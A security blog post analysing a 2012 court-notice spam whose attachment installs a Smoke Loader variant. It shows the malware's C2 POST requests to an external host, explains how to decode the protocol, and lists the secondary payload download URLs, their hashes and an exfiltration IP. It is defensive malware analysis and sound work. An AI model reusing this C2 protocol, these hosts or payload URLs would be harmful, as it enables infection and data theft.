Court Notification

On 2012-03-29 via Cisco’s Security Intelligence Operations, we observed an interesting spam sample with the subject line “Court is aCourt notification”. This spam sample had the following body text,

Notice!

The company “New Balance” has sued you for sending spam.
A copy of the lawsuit is attached to the letter,

Thank you.
U.S. Legal Support

Oh, the irony! A spam sample threatening legal action in response to … spamming!

Anywho, the observed spam sample contained the following malicious attachment:

File: Lawsuit_From_Legal Support_22nd_of_March.exe
Size: 58368
MD5: FC1DCCE6644E425C7C68CCCCBAFCE8B6

This sample installed itself in the following location C:\Documents and Settings\Administrator\Application Data\A11519.exe.

When executed in a lab environment this sample initiated a connectivity check to http://www.google.com. The sample then connected to a command and control server at beaufortseaa139.ru via the following POST request:

POST /qad/index.php HTTP/1.0
User-Agent: Mozilla/4.0
Host: beaufortseaa139.ru
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 20

smk=AmFvZj9lZ3ZlcGNg

This POST request mirrors the traffic pattern seen in our earlier blog American Airlines Ticket Attachment. Thats right, this sample is indeed another Smoke Loader variant. Our friends over at the Tracking Cybercrime blog have a good blog post detailing how Smoke Loader is marketed and sold in the underground.

Smoke Loader samples are clearly identifiable by the ‘smk=’ string observed in the POST data sent to the command and control server. The above POST data smk=AmFvZj9lZ3ZlcGNg is clearly encoded. As established in our earlier blog this data can be decoded via a two step process. First the data must be base64 decoded. This step gives us the following output:

AmFvZj9lZ3ZlcGNg >> base64 decodes to >> .aof?egvepc`.

Now, if we take the hex output of our base64 decoding operation we get a result of 02616F663F65677665706360.

Note that the first character of the text output of the decoding operation is ‘.’ or a null character. A null character in hex should be ’00’. As the first byte of our hex output is ’02’ we can then assume that a simple XOR decoding operation with the key 0x02 should reveal the plaintext POST data.

02616F663F65677665706360 >> 0x02 XOR decodes to >> cmd=getgrab

The POST request returns the following encoded file with the following properties:

File: 198
Size: 436228
MD5: ED113B12304243E7F532B370548A2D1C

This encoded file is a grabber designed to steal password from various FTP, instant messaging, mail, and web browsers.

This Smoke Loader variant then sends the following data via a POST request to beaufortseaa139.ru/qad/index.php

smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9DQzE1MTtAQUZHM0A0RzQzMzYxOzU7NUBDMjE3OzExMUNAQzMzNzM7JHJtcHY/MTM7OzU=

Using the same process detailed above we see that this string decodes to:

.cmd=getsocks&login=AA3739BCDE1B6E611439797BA0359333ABA11519&port=31997

This command downloads a SOCK proxy.

The next POST to beaufortseaa139.ru/qad/index.php includes the following string:

smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0NDMTUxO0BBRkczQDRHNDMzNjE7NTs1QEMyMTc7MTExQ0BDMzM3MzskcWduPzA6b2MkdGdwPzcsMyRga3ZxPzI=

This decodes to:

.cmd=getload&login=AA3739BCDE1B6E611439797BA0359333ABA11519&sel=28ma&ver=5.1&bits=0

The ‘getload’ command asks the control server how many secondary payloads it should download. The ‘login’ parameter appears to be a unique identifier specific to the particular victim. The ‘sel’ parameter appears to be an identifier for the particular Smoke Loader campaign associated with this spam campaign. The ’28ma’ string likely represents the date of March 28. The ‘ver’ parameter appears to identify the OS of the infected victim.

The command and control server at  beaufortseaa139.ru returns the following response ‘Smk4’ indicating that the victim should download 4 additional files.

The victim then downloads the following files:

http://www.theoldpalmerhouse.com/orderspro/template/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.theoldpalmerhouse.com/orderspro/template/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

http://www.maliks.com/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.maliks.com/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

Note that the files hosted at theoldpalmerhouse.com and maliks.com are identical. This duplication of effort is likely carried to increase the chances that these secondary payloads are successfully installed.

The payload doc.exe is a doc stealer. It harvests the victim machine for .doc and .xls files. Stolen files are ex-filtrated to 91.201.4.62 over port 8000. This is the same IP used in the  American Airlines Ticket Attachment post.

Advertisements

One Comment

  1. Brynn Hatmaker
    Posted April 16, 2012 at 9:42 pm | Permalink | Reply

    Say, you got a nice article post. Awesome.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: